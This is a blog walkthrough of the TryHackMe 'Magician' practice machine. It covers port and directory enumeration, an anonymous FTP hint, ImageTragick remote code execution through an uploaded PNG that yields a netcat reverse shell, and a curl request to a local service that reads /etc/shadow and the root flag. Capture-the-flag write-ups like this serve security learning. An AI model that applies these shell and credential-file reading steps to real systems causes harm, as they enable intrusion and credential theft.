Magician Writeup (TryHackMe Easy Machine)

-

This magical website lets you convert image file formats.


Overview

Magician is an easy Linux machine from TryHackMe. This box is great for beginners, as it’s dealing with infamous critical vulnerability in ImageMagick suite, which you need to exploit and get RCE. There are also hints along the way as a reward for your progress.

We start with enumerating 2 web servers, one serving as back end storage or API for the other. Then we discover message for us on FTP server, guiding us towards ImageTragick exploit, in which we embed commands into PNG file. These commands will get executed after we upload the file.

After we get a shell, we discover secret internal service, that takes input parameter “filename” and yields back encoded content of the file provided.


Nmap scan

Starting with Nmap scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 10.10.188.136 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 09:09 EDT
Nmap scan report for magician (10.10.188.136)
Host is up (0.071s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
8080/tcp open  http    Apache Tomcat (language: en)
|_http-title: Site doesn't have a title (application/json).
8081/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT      ADDRESS
1   55.52 ms 10.9.0.1
2   55.58 ms magician (10.10.188.136)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.13 seconds

The Nmap scan showed that 3 ports are open. There’s FTP on port 21, Apache Tomcat HTTP server on port 8080 and another Nginx HTTP server on port 8081. Don’t forget to add “magician” to your “/etc/hosts” file.


Web enumeration

Firstly, I checked the web server on port 8080. Error message was displayed, giving me back the 404 Not Found error.

Next, I looked at the web server on port 8081. There was “PNG to JPG converter” web application.


I ran Gobuster on both web servers and discovered some interesting directories.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u "http://magician:8080" -w /usr/share/wordlists/dirb/common.txt -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://magician:8080
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/error                (Status: 500) [Size: 105]
/files                (Status: 200) [Size: 2]
/upload               (Status: 405) [Size: 0]
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u "http://magician:8081" -w /usr/share/wordlists/dirb/common.txt -t 64                      
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://magician:8081
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 194] [--> http://magician:8081/css/]
/favicon.ico          (Status: 200) [Size: 9662]
/img                  (Status: 301) [Size: 194] [--> http://magician:8081/img/]
/index.html           (Status: 200) [Size: 1105]
/js                   (Status: 301) [Size: 194] [--> http://magician:8081/js/]


When I looked at the web requests with the Firefox Dev tools, there was a GET request to the first web server to “/files”. Most likely, that’s where uploaded files go.

To me, it seemed like the server on port 8080 serves as back end API or storage for files from the web application on port 8081.

I uploaded both PNG file and PHP file with a shell. Surprisingly, there was no back end script that validated the file type. I couldn’t execute the shell thou.

list of uploaded files on web server hosted on port 8080


FTP server

Upon connecting, I quickly found out that this server is anonymous login only. So I logged in as “anonymous”, waited a bit due to some delay script and got inside.

┌──(kali㉿kali)-[~]
└─$ ftp magician     
Connected to magician.
220 THE MAGIC DOOR
Name (magician:kali): magician 
530 This FTP server is anonymous only.
ftp: Login failed
ftp> bye
221 Goodbye.
                                                                                                                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ ftp magician
Connected to magician.
220 THE MAGIC DOOR
Name (magician:kali): anonymous
331 Please specify the password.
Password: 
230-Huh? The door just opens after some time? You're quite the patient one, aren't ya, it's a thing called 'delay_successful_login' in /etc/vsftpd.conf ;) Since you're a rookie, this might help you to get started: https://imagetragick.com. You might need to do some little tweaks though...
230 Login successful.

A message was displayed to me with a hint. I visited the link I was given (https://imagetragick.com/).


Exploiting ImageMagick RCE & user flag

There was an article about RCE vulnerability found in image processing package ImageMagick. The vulnerability arises due to ImageMagick’s handling of certain file formats (such as SVG, MVG, and others) when using external delegate commands for image processing. Attackers could craft an image file containing embedded commands, which ImageMagick would then execute when processing the file.

ImageMagick is open-source software suite used for creating, editing, converting, and manipulating images. It supports a wide range of image formats, including PNG, JPEG, GIF, TIFF, BMP, and many others. (ChatGPT)


After researching this CVE, I found out that the famous “PayloadsAllTheThings” Github repository has several prepared PNG files with working payloads. I went on with this one.

I set up a listener and uploaded the malicious PNG file. I got shell right away as user “magician”.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.9.1.229] from (UNKNOWN) [10.10.104.221] 43946
whoami
magician
pwd
/tmp/hsperfdata_magician

I could get into my user’s home directory, which contained the user flag. Now onto the root!


Root flag

I checked other files in the home directory. One looked like another hint.

magician@magician:~$ ls -la
total 17204
drwxr-xr-x 5 magician magician     4096 Feb 13  2021 .
drwxr-xr-x 3 root     root         4096 Jan 30  2021 ..
lrwxrwxrwx 1 magician magician        9 Feb  6  2021 .bash_history -> /dev/null
-rw-r--r-- 1 magician magician      220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 magician magician     3771 Apr  4  2018 .bashrc
drwx------ 2 magician magician     4096 Jan 30  2021 .cache
drwx------ 3 magician magician     4096 Jan 30  2021 .gnupg
-rw-r--r-- 1 magician magician      807 Apr  4  2018 .profile
-rw-r--r-- 1 magician magician        0 Jan 30  2021 .sudo_as_admin_successful
-rw------- 1 magician magician     7546 Jan 31  2021 .viminfo
-rw-r--r-- 1 root     root     17565546 Jan 30  2021 spring-boot-magician-backend-0.0.1-SNAPSHOT.jar
-rw-r--r-- 1 magician magician      170 Feb 13  2021 the_magic_continues
drwxr-xr-x 2 root     root         4096 Feb  5  2021 uploads
-rw-r--r-- 1 magician magician       24 Jan 30  2021 user.txt
magician@magician:~$ cat the_magic_continues 
The magician is known to keep a locally listening cat up his sleeve, it is said to be an oracle who will tell you secrets if you are good enough to understand its meows.
magician@magician:~$

I understood it in a way that there’s some internal service running which I need to exploit. So I ran “netstat” and discovered that something is running on port 6666.

magician@magician:~$ netstat -tlnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:6666          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:8081            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::8080                 :::*                    LISTEN      1049/java           
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
magician@magician:~$


I used “curl” to make a GET request to the port 6666, hoping it will give me a response and it did. There was even a trollface near the bottom of the response. I analyzed the response and noticed that there’s an input field called “filename” with text saying “Enter filename”.

discovered input parameter “filename” in the response

I got immediately excited because this looked like an invitation to arbitrary file reading.


I added “-d” to my “curl” command to append data “filename=/etc/shadow” to the request. I wanted to test if it will give me back the content of such file like “/etc/shadow”. And it did, but base64 encoded.

magician@magician:~$ curl http://localhost:6666 -d "filename=/etc/shadow"

I booted up CyberChef and decoded the string. Just as I thought, I got the entire file back.

So I just replaced “/etc/shadow” with “/root/root.txt” and got the flag. Don’t worry if you get different type of encryption in the response (like Hex or Rot13), it seems to be randomized.


Summary

Magician is an easy machine from TryHackMe. Very fun box. Unlike traditional and more serious boxes, there are numerous hints along the way, which made this machine a bit more fun. We get the chance to exploit ImageTragick vulnerability in ImageMagick suite, granting ourselves the RCE. Once inside, we discover strange internal service. Our sharp eyes find out that we need to provide a parameter with a file to get it’s content. This machine makes us practice our cybersecurity skills, as well as our critical thinking and careful observation skills.

Comments

Post a Comment

Popular posts from this blog

Hospital Writeup (HackTheBox Medium Machine)

-
Image
Overview Hospital is a medium Windows machine from HackTheBox. This box makes you go against file upload, kernel exploits, database dumping, command injection and keylogging. We start with bypassing file upload restrictions, while evading functions disabled by PHP config. Once we get the shell on Linux container, we dump the database and discover an exploit for unpatched Linux kernel. The exploit gives us a root shell. Next, we crack the hash and use the password to log into Roundcube Webmail. We then abuse the command injection in EPS files and in GhostScript to get shell as another user with higher privileges. We then notice another session running under our user. We use Metasploit’s Meterpreter to migrate to process which runs on that second session and use Meterpreter’s additional functionality to make a screenshot of the desktop and capture keystrokes from that session. Since the user was logging into Webmail as Administrator, we captured his password in the process.
Read more

Bucket Writeup (HackTheBox Medium Machine)

-
Image
Overview Bucket is a medium Linux machine from HackTheBox. This box introduces you to Cloud hacking (kinda) and lets you play with S3 bucket from AWS, showcasing common misconfigurations. We start with discovering special subdomain, which represents an exposed S3 bucket with files used by the web server. After enumeration with “aws” utility, we find out that we can download and upload files. So we upload PHP reverse shell and get initial foothold. Once in, we dump the exposed DynamoDB database and get the credentials for user “roy”, getting the user flag afterwards. Next, we discover several internal services running. We find the source code in Roy’s project files and discover SSRF vulnerability, which leads to arbitrary file read, allowing us to read any file on the machine, including the root flag.
Read more

Mr Robot Writeup (Vulnhub Intermediate Machine)

-
Image
Based on the show, Mr. Robot. This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate. Overview Mr. Robot is a beginner-intermediate Linux machine from Vulnhub. It’s based on the show Mr. Robot and has some cool references to it. We start with enumeration of a Wordpress website. We discover an exposed login page and encoded credentials. Once we get into dashboard, we modify a template and gain remote access. Next, we compromise another user by cracking his hash and getting his password. We discover that Nmap has SUID bit set on the machine, which is very insecure because of Nmap’s functionality. We get 3 flags along the way: 1. on special website page, 2. as user flag and 3. as root flag.
Read more